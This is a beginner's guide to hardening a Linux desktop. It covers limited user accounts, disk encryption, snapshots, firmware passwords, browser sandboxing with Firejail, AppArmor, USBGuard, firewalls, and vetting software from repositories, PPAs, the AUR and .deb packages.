No system is absolutely secure!
No matter how many steps or processes you implement, there is always a potential security hole.
This guide is going to present a few ways to secure your system from intrusions, malicious software and unwanted connections. There is always a balance between security and convenience. The more secure your system is, the less convenient is it to use.
Who wants a “bricked” computer because it is so secure you can’t even use it?
Please use some of the suggestions below as a baseline to secure your system. Then implement more in the future as you learn how to manage them.
Linux Built-In Security
Every Linux distribution includes security features like other operating systems.
Users are tied to groups with access to their own files and data. Linux adds another layer of security when an application needs to run or install. The current user needs to be in the super user group, then enter a password when software is installed or permissions need to be changed. If you copy any executable files from one computer to another, the execute permissions are disabled. The root file system also has extra security requiring you to enter your super user password before making any changes to files or directories.
Local User Access
Creating a limited user account can be useful for secure browsing, gaming and personal use. This limited account can not install any software, updates or packages. This account will not store any files or data locally as it is meant for temporary use. It is not a member of any Unix groups which prevents sudo capabilities. If this account is compromised there is no way to gain access deeper in the system through “sudo” or “su”. You can configure users who need “sudo” access to be in a group names: Wheel
- Limited Account (no SU/Sudo access)
If you need to install a game or application, use the “Switch User” option by going to the logout button. Login as a super user and install the software, then switch back to your limited user.
Note: If your distribution does not provide the “Switch User” option you will need to use the TTY shell and start your graphical environment. This is outside the scope of this guide.
Encryption does not protect your data from malicious threats or harmful software. Instead it protects your data from physical theft. Most Linux distributions have an application called: dm-crypt
You create a partition for your sensitive data (LUKS partition). When you unlock it, you can format it and mount it. Then use it for any purpose, even an operating system.
Another way to encrypt your hard drive is using an “encryption layer”. You can encrypt a directory on your hard drive and can result in poor performance but offer more flexibility.
Note: Do not encrypt your UEFI partition
File System Backup
Snapshots can roll your system back in time by creating a copy of your system files and configurations. This way if your system breaks or is compromised you can roll back to an earlier date when it was stable and secure. There is also risk of your snapshot backups being compromised as well. So it is recommended to keep them on an external drive or a separate partition.
Note: The best method of cleaning up a compromised system is a fresh installation of Linux
Every motherboard has some type of firmware that communicates between the hardware and software. Legacy computers have what is called a BIOS hosted on a chip on the motherboard. Newer systems have a bootloader called UEFI on a hard drive partition (FAT). Both have very similar settings, but UEFI has significantly more settings and control than BIOS.
In order to enter your UEFI it requires a reboot and a keyboard key pressed while booting. Each computer has security settings in UEFI to secure your hardware and firmware configurations.
Web browsers are one the most vulnerable ways to exploit your system. Websites can cache (store files) cookies, scripts, images and more on your local computer.
- Sandbox Firefox
- Noscript plugin
Noscript is a plugin that refuses all scripts that run in the browser. Then you can manually whitelist scripts you want to enable for a specific webpage/URL.
Sandboxing is a better way to secure your browser as it removes access to your /home/username directory. Firejail can run for all applications on your system, but can affect applications like Wine. Firejail provides profile templates (may need to install separately) to configure what you want Firefox to allow.
Then run Firefox with the following command: firejail firefox
Now Firefox only has access to the downloads directory (depending on the profile you use). If it is exploited by a malicious plugin, extension, script or other method it only has access to downloads, not other /home/username directories. It also prevents local scripts from being launched by your browser.
Apparmor can be configured with profiles to allow applications to access only what they need to run. If an application tries to access a system process or service that is out-of-scope, then Apparmor will deny it. The profiles are common to Linux software environments. This adds slightly more security over the default file permission restrictions on Linux.
External Devices (USB)
Your system firmware (UEFI) can be compromised with an external USB device. This means someone could steal your computer, use a USB flash drive to boot into their own operating system and access your files. Encryption can prevent this, but another layer of security helps by denying physical access.
- USB Guard
Every computer has an ability to secure its firmware with a password. This protects malicious hacking and booting USB devices. Make sure to configure your firmware to only boot to internal hard drive first. Please keep the password in a secure location. Losing the password could “brick” your device as well.
USB Guard can deny all unauthorized USB access to a running Linux operating system only. You can manually whitelist each device you want to allow communication. The safest option is to completely deny all USB access, but obviously we might need a flash drive, external webcam, speakers or even a controller to user our system. USB Guard blocks devices on a kernel level by default.
Applications that run over a network connect via ports through the operating system network configuration. Applications like games, browsers, FTP and more. Firewalls can protect your computer from malicious incoming connections from outside the computer. The most secure configuration is DENY all incoming connections. Then open ports as needed depending on the application you are using. By default most Linux distributions have disabled network facing services.
- gufw (With a Graphical User Interface)
Example: Open port 22 in order to allow an SSH connection on the local network only.
The majority of threats and malicious software is written to execute in a Windows environment and probably won’t affect your Linux processes. Some have actually scanned their distribution with an antivirus and it resulted in finding threats, but after researching they found it was in part of the definitions meant for Windows environments.
- Distribution Repositories
Repositories are collections of software packages. All your software and updates are installed from a repository. Distributions are normally configured to use their official repositories. You can also add your own depending on the software and updates you want to install.
Each repository is handled by communities or single individuals who create software, compile them for ready-to-use installations and updates. By using a Linux distribution, you are choosing to trust all officially packaged software provided by the people who package for your chosen distribution. Most distributions are also open to add unofficial repositories, such as PPA’s for Ubuntu and Mint.
In Mint you can check the source of all the repositories by looking in the source file:
Each URL is a repository
PPA (Personal Package Archive)
A PPA is a software repository you can add to your distribution to install software and/or updates for that software. Anyone can create an unofficial repository and potentially include malicious software with it, so you should never blindly trust an unofficial source. Any PPA you add will also be located in the source file:
Install an application like simplescreenrecorder and it requires a PPA to automatically update it.
Arch User Repository AUR
Arch users can additionally use the AUR to download the source code and compile it themselves. This process has been automated in AUR, but its important to inspect the PKGBUILD file to check the source code URLs. Also check included patches/install scripts to verify nothing malicious is included. This could take some time researching if you aren’t familiar with the process.
Debian, Ubuntu, Mint and other distributions (based on Debian) can install applications via .deb
Any developer can create a .deb installer so it is important to investigate the maintainer or source before installing it. You can also inspect a .deb by opening it with Archive Manager. Checking out the directories and included files, then researching online.
Flatpak and Snap
Other ways to provide software from 3rd party repositories is applications like Flatpak and Snap. These can install other unnecessary packages (aka bloatware) and anyone developer can add their package to them. Please use at your own risk and investigate software before installing it.